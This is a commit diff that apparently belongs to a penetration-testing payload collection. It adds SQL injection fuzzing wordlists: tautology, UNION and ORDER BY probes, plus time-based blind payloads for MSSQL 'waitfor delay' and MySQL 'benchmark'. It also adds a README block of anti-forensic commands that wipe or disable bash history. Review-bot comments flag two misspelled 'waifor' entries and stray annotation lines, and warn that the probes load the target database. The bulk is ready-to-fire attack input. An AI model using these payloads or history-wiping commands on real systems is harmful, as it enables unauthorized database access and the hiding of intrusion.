SQL injection - Intruders payloads
parent
699d66d701
commit
cce0444245
@ -78,6 +78,26 @@ Clear the last line of the history.
|
|||||||
history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
|
history -d $(history | tail -2 | awk '{print $1}') 2> /dev/null
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Clear history
|
||||||
|
|
||||||
|
```bash
|
||||||
|
[SPACE] ANY COMMAND
|
||||||
|
or
|
||||||
|
export HISTSIZE=0
|
||||||
|
export HISTFILESIZE=0
|
||||||
|
unset HISTFILE; CTRL-D
|
||||||
|
or
|
||||||
|
kill -9 $$
|
||||||
|
or
|
||||||
|
echo "" > ~/.bash_history
|
||||||
|
or
|
||||||
|
rm ~/.bash_history -rf
|
||||||
|
or
|
||||||
|
history -c
|
||||||
|
or
|
||||||
|
ln /dev/null ~/.bash_history -sf
|
||||||
|
```
|
||||||
|
|
||||||
The following directories are temporary and usually writeable
|
The following directories are temporary and usually writeable
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
@ -86,7 +106,6 @@ The following directories are temporary and usually writeable
|
|||||||
/dev/shm/
|
/dev/shm/
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
|
|
||||||
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
|
||||||
|
88
SQL injection/Intruders/SQL-Injection
Normal file
@ -0,0 +1,88 @@
|
|||||||
|
'
|
||||||
|
''
|
||||||
|
`
|
||||||
|
``
|
||||||
|
,
|
||||||
|
"
|
||||||
|
""
|
||||||
|
/
|
||||||
|
//
|
||||||
|
\
|
||||||
|
\\
|
||||||
|
;
|
||||||
|
' or "
|
||||||
|
-- or #
|
||||||
|
' OR '1
|
||||||
|
' OR 1 -- -
|
||||||
|
" OR "" = "
|
||||||
|
" OR 1 = 1 -- -
|
||||||
|
' OR '' = '
|
||||||
|
'='
|
||||||
|
'LIKE'
|
||||||
|
'=0--+
|
||||||
|
OR 1=1
|
||||||
|
' OR 'x'='x
|
||||||
|
' AND id IS NULL; --
|
||||||
|
'''''''''''''UNION SELECT '2
|
||||||
|
%00
|
||||||
|
/*…*/
|
||||||
|
+ addition, concatenate (or space in url)
|
||||||
|
|| (double pipe) concatenate
|
||||||
|
% wildcard attribute indicator
|
||||||
|
|
||||||
|
@variable local variable
|
||||||
|
@@variable global variable
|
||||||
|
|
||||||
|
|
||||||
|
# Numeric
|
||||||
|
AND 1
|
||||||
|
AND 0
|
||||||
|
AND true
|
||||||
|
AND false
|
||||||
|
1-false
|
||||||
|
1-true
|
||||||
|
1*56
|
||||||
|
-2
|
||||||
|
|
||||||
|
|
||||||
|
1' ORDER BY 1--+
|
||||||
|
1' ORDER BY 2--+
|
||||||
|
1' ORDER BY 3--+
|
||||||
|
|
||||||
|
1' ORDER BY 1,2--+
|
||||||
|
1' ORDER BY 1,2,3--+
|
||||||
|
|
||||||
|
1' GROUP BY 1,2,--+
|
||||||
|
1' GROUP BY 1,2,3--+
|
||||||
|
' GROUP BY columnnames having 1=1 --
|
||||||
|
|
||||||
|
|
||||||
|
-1' UNION SELECT 1,2,3--+
|
||||||
|
' UNION SELECT sum(columnname ) from tablename --
|
||||||
|
|
||||||
|
|
||||||
|
-1 UNION SELECT 1 INTO @,@
|
||||||
|
-1 UNION SELECT 1 INTO @,@,@
|
||||||
|
|
||||||
|
1 AND (SELECT * FROM Users) = 1
|
||||||
|
|
||||||
|
' AND MID(VERSION(),1,1) = '5';
|
||||||
|
|
||||||
|
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
|
||||||
|
|
||||||
|
|
||||||
|
Finding the table name
|
||||||
|
|
||||||
|
|
||||||
|
Time-Based:
|
||||||
|
,(select * from (select(sleep(10)))a)
|
||||||
|
%2c(select%20*%20from%20(select(sleep(10)))a)
|
||||||
|
';WAITFOR DELAY '0:0:30'--
|
||||||
|
|
||||||
|
Comments:
|
||||||
|
|
||||||
|
# Hash comment
|
||||||
|
/* C-style comment
|
||||||
|
-- - SQL comment
|
||||||
|
;%00 Nullbyte
|
||||||
|
` Backtick
|
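Review bot: Several lines in this new wordlist appear to be annotations rather than test strings: `# Numeric`, `Finding the table name`, `Time-Based:`, `Comments:`, and the operator glossary such as `+ addition, concatenate (or space in url)` and `@variable local variable`. The file sits under `Intruders/`, where a fuzzer treats every line as an input, so each of these is sent to the application as a request and adds noise to the results that have to be triaged. Moving the explanations into the section's README and keeping this file to one test string per line would make it clear which responses correspond to an actual probe. The blank lines between groups have the same effect unless the loading tool skips empty entries.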
107
SQL injection/Intruders/payloads-sql-blind-MSSQL-INSERT
Normal file
@ -0,0 +1,107 @@
|
|||||||
|
)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
')%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
')%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
")%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
")%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
))%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
))%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'))%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'))%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"))%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"))%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
|
||||||
|
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
|
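Review bot: Two entries misspell the keyword as `waifor` (the `',NULL)…/*` and `'),NULL)…/*` lines), so they can only produce a syntax error, and a "no delay" result for those two contexts says nothing about the application. They should read `',NULL)%20waitfor%20delay%20'0:0:20'%20/*` and `'),NULL)%20waitfor%20delay%20'0:0:20'%20/*` like their neighbours. The six-NULL group also opens with the `--` form only, which is why the file has 107 entries where the pattern suggests 108. Separately, every entry here and in payloads-sql-blind-MSSQL-WHERE holds a database worker for 20 seconds, so replaying the list concurrently can exhaust the connection pool of the system under test. A README line stating that, and noting that `waitfor delay` inside a request parameter is a high-signal string for WAF rules and query-log alerting, would serve testers and defenders alike.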
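--- a/SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE
+++ b/SQL injection/Intruders/payloads-sql-blind-MSSQL-WHERE
@@ -0,0 +1,40 @@
+waitfor delay '0:0:20' /*
+waitfor delay '0:0:20' --
+' waitfor delay '0:0:20' /*
+' waitfor delay '0:0:20' --
+" waitfor delay '0:0:20' /*
+" waitfor delay '0:0:20' --
+) waitfor delay '0:0:20' /*
+) waitfor delay '0:0:20' --
+)) waitfor delay '0:0:20' /*
+)) waitfor delay '0:0:20' --
+))) waitfor delay '0:0:20' /*
+))) waitfor delay '0:0:20' --
+)))) waitfor delay '0:0:20' /*
+)))) waitfor delay '0:0:20' --
+))))) waitfor delay '0:0:20' --
+)))))) waitfor delay '0:0:20' --
+') waitfor delay '0:0:20' /*
+') waitfor delay '0:0:20' --
+") waitfor delay '0:0:20' /*
+") waitfor delay '0:0:20' --
+')) waitfor delay '0:0:20' /*
+')) waitfor delay '0:0:20' --
+")) waitfor delay '0:0:20' /*
+")) waitfor delay '0:0:20' --
+'))) waitfor delay '0:0:20' /*
+'))) waitfor delay '0:0:20' --
+"))) waitfor delay '0:0:20' /*
+"))) waitfor delay '0:0:20' --
+')))) waitfor delay '0:0:20' /*
+')))) waitfor delay '0:0:20' --
+")))) waitfor delay '0:0:20' /*
+")))) waitfor delay '0:0:20' --
+'))))) waitfor delay '0:0:20' /*
+'))))) waitfor delay '0:0:20' --
+"))))) waitfor delay '0:0:20' /*
+"))))) waitfor delay '0:0:20' --
+')))))) waitfor delay '0:0:20' /*
+')))))) waitfor delay '0:0:20' --
+")))))) waitfor delay '0:0:20' /*
+")))))) waitfor delay '0:0:20' --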
90
SQL injection/Intruders/payloads-sql-blind-MySQL-INSERT
Normal file
@ -0,0 +1,90 @@
|
|||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
|
||||||
|
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
|
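Review bot: Nothing in the commit documents the cost of the probe `benchmark(3000000,MD5(1))`, which is used by every entry in this list and in payloads-sql-blind-MySQL-ORDER_BY and payloads-sql-blind-MySQL-WHERE. The call is CPU-bound, so each request that reaches the database burns a core for a hardware-dependent amount of time rather than pausing for a fixed interval. Running 90 such entries per parameter against a shared or production database can degrade it for other users. I would add a README line next to these files along the lines of `benchmark() probes consume database CPU; throttle requests and agree the test window with the system owner`. For defenders, the same README could note that `benchmark(` with a large iteration count in a request parameter or in the slow-query log is a reliable detection signal.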
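--- a/SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
+++ b/SQL injection/Intruders/payloads-sql-blind-MySQL-ORDER_BY
@@ -0,0 +1,18 @@
+,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
+,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
+',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
+',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
+",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
+",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
+",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
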